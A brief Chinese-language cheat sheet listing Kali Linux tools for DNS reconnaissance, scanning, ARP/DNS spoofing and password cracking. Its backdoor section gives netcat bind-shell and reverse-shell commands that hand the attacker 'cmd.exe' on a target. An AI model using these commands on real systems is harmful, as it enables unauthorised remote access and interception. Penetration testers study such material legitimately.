kali hack tools

DNS 分析

dnsdict6

install

• wget https://github.com/vanhauser-thc/thc-ipv6/archive/refs/tags/v3.8.tar.gz
• tar zvxf v3.8.tar.gz
• cd thc-ipv6-3.8
• sudo apt-get install libpcap-dev libssl-dev libnetfilter-queue1 libnetfilter-queue-dev
• make
• sudo cp dnsdict6 /usr/bin/

usage

• Enumerates a domain for DNS entries.

dnsmap

dnsrecon

fierce

• 查找目标的ip和主机名，进行子域名爆破

lbd

• load balance detector
• 检测DNS、HTTP、HTTPS是否负载均衡

reverseraider

• kali已经移除

host

dig

dnsenum

dmitry

网络扫描

traceroute

• windows 下 tracert
• 用于探测网络环境

tctrace

搜索引擎信息

fimap

• 漏洞扫描
• 谷歌搜素结果收集

theharvester

• 多种引擎可以用

后门维持连接

netcat

• 维持了 cmd.exe 的权限
• 目标机器：nc.exe -d -L -p 8888 -e cmd.exe；入侵机器：nc 目标ip 8888
• 入侵机器：nc -l -p 8888；目标机器：nc.exe -d 入侵机器ip 8888 -e cmd.exe

内网安全

• arp欺骗：ettercap
• dns欺骗
• 截获数据流量：在arp欺骗到目标网卡基础上，driftnet -i 目标网卡

密码攻击

• medusa
• hashcat
• rarcrack: rar 密码破解
• fcrackzip: zip 密码破解
• crunch: 离线密码破解
• cewl: 在线密码破解
• hydra: 在线密码破解